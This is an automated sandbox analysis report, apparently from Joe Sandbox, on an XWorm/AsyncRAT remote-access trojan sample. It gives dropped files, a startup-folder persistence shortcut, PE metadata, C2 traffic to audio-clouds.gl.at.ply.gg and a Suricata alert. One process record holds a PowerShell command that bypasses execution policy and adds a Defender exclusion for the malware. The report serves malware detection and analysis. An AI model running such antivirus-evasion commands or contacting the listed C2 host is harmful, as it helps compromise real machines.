                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldlmwf3x.1w1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oih5z1x3.03r.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptjmfbtn.xyz.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rltlizyn.b2w.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5zrkp2m.vzs.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sslnbjtl.ep5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swtpunoc.pey.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wk3zmf5u.ogn.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yo33yrmw.kjg.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\aZDwfEKorn.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 18:18:36 2024, mtime=Sat Dec 14 18:18:36 2024, atime=Sat Dec 14 18:18:36 2024, length=40960, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):732
                                                                          Entropy (8bit):5.04724089277934
                                                                          Encrypted:false
                                                                          SSDEEP:12:805Kw43G0TN+2Chai1Y//EbKGhqjLlvl1jAAyNHVdmeJpaeJpzBmV:80I33w2998b4lvlBAAcdzp3ptm
                                                                          MD5:55AFB63B92C39955016AE5EBA1D776E9
                                                                          SHA1:329774E48F88380F1E3E589779F68852CD44F426
                                                                          SHA-256:3105F8808BE883A916706E6DD259BE10B8BF7B9486433A2E48E2A90467949ED2
                                                                          SHA-512:025016D7C5642871CFCC5D510A85DDE9FBB1E5CFED26F5CF7A8709ABEFB86F220AA505EB51B39B58424774A1BBEC83B97D7081AFC478C2F6C8CE13A6C0CF95B0
                                                                          Malicious:false
                                                                          Preview:L..................F.... ....@1.\N...@1.\N...@1.\N..........................d.:..DG..Yr?.D..U..k0.&...&......Qg.*_.......PN..i.R.\N......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YE...........................3*N.A.p.p.D.a.t.a...B.V.1......Y|...Roaming.@......EW.=.Y|...........................=N..R.o.a.m.i.n.g.....P.2......YS. .boost.<......YS..YS.....A"....................:z..b.o.o.s.t.......W...............-.......V...........P..t.....C:\Users\user\AppData\Roaming\boost........\.....\.....\.....\.....\.b.o.o.s.t.`.......X.......098239...........hT..CrF.f4... .x..!P....,......hT..CrF.f4... .x..!P....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                          C:\Users\user\AppData\Roaming\boost

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\aZDwfEKorn.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):40960
                                                                          Entropy (8bit):5.550340510225428
                                                                          Encrypted:false
                                                                          SSDEEP:768:TUIDwCrxY4mpc9iauv6hCuuJf27PPfFWPG9/mK6OOwhKjmb2:TdDwCFY4gckpwCuuJfiFv9/X6OOwkS6
                                                                          MD5:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          SHA1:0700E214D49944A83A141DBB5C982BBF8EFE2D3F
                                                                          SHA-256:803C3419BD5A171884FF51F1D75CE521A505E817FD42F1D52AC0DE3C33F6DFCA
                                                                          SHA-512:320741A2B55C6E39D376979299207FBB3FFDC655167A23FFD24E4B073AB76344D660054593B249970653F71294E701F004416C392868F2E1202BB9442FF2D41D
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\boost, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\boost, Author: ditekSHen
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 82%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}]g................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........[...W............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):55
                                                                          Entropy (8bit):4.306461250274409
                                                                          Encrypted:false
                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                          Malicious:false
                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.550340510225428
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:aZDwfEKorn.exe
                                                                          File size:40'960 bytes
                                                                          MD5:cc052d76ffa12621e3a1faac9a71aa2a
                                                                          SHA1:0700e214d49944a83a141dbb5c982bbf8efe2d3f
                                                                          SHA256:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca
                                                                          SHA512:320741a2b55c6e39d376979299207fbb3ffdc655167a23ffd24e4b073ab76344d660054593b249970653f71294e701f004416c392868f2e1202bb9442ff2d41d
                                                                          SSDEEP:768:TUIDwCrxY4mpc9iauv6hCuuJf27PPfFWPG9/mK6OOwhKjmb2:TdDwCFY4gckpwCuuJfiFv9/X6OOwkS6
                                                                          TLSH:8F036D843BD48222DAEE7BF91973A50A0B31FA135923DB8E4CD4599F1B37BD089403D6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}]g................................. ........@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40b3fe
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x675D7D8C [Sat Dec 14 12:43:56 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb3a80x53.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4d0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x94040x9600392db2107c5975c9319123624b9af1baFalse0.4861979166666667data5.670427163184261IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0xc0000x4d00x60088bbf8af3de61b972adaf3874313c6bcFalse0.3736979166666667data3.6932361765673365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xe0000xc0x200251cf3061796844a58b298fe856f5db3False0.041015625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0xc0a00x23cdata0.4755244755244755
                                                                          RT_MANIFEST0xc2e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-14T18:53:51.009659+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749887147.185.221.2428408TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 14, 2024 18:53:13.338315010 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:13.458293915 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:13.458570004 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:13.588061094 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:13.708017111 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:24.184516907 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:24.304271936 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:34.776448965 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:34.918107986 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:35.339212894 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:35.339306116 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:38.525316000 CET4982628408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:38.526904106 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:38.657804012 CET2840849826147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:38.657845020 CET2840849887147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:38.658010960 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:38.692070961 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:38.812304974 CET2840849887147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:53:51.009659052 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:53:51.279019117 CET2840849887147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:54:00.558197021 CET2840849887147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:54:00.558271885 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:02.087584972 CET4988728408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:02.089061022 CET4993828408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:02.208699942 CET2840849887147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:54:02.210026026 CET2840849938147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:54:02.210112095 CET4993828408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:02.246972084 CET4993828408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:02.374911070 CET2840849938147.185.221.24192.168.2.7
                                                                          Dec 14, 2024 18:54:10.937463999 CET4993828408192.168.2.7147.185.221.24
                                                                          Dec 14, 2024 18:54:11.063613892 CET2840849938147.185.221.24192.168.2.7

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 14, 2024 18:53:13.065399885 CET5510653192.168.2.71.1.1.1
                                                                          Dec 14, 2024 18:53:13.330744028 CET53551061.1.1.1192.168.2.7

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 14, 2024 18:53:13.065399885 CET192.168.2.71.1.1.10x4f04Standard query (0)audio-clouds.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 14, 2024 18:53:13.330744028 CET1.1.1.1192.168.2.70x4f04No error (0)audio-clouds.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:12:52:01
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\Desktop\aZDwfEKorn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\aZDwfEKorn.exe"
                                                                          Imagebase:0xd30000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:7
                                                                          Start time:12:52:04
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:12:52:04
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:12:52:13
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
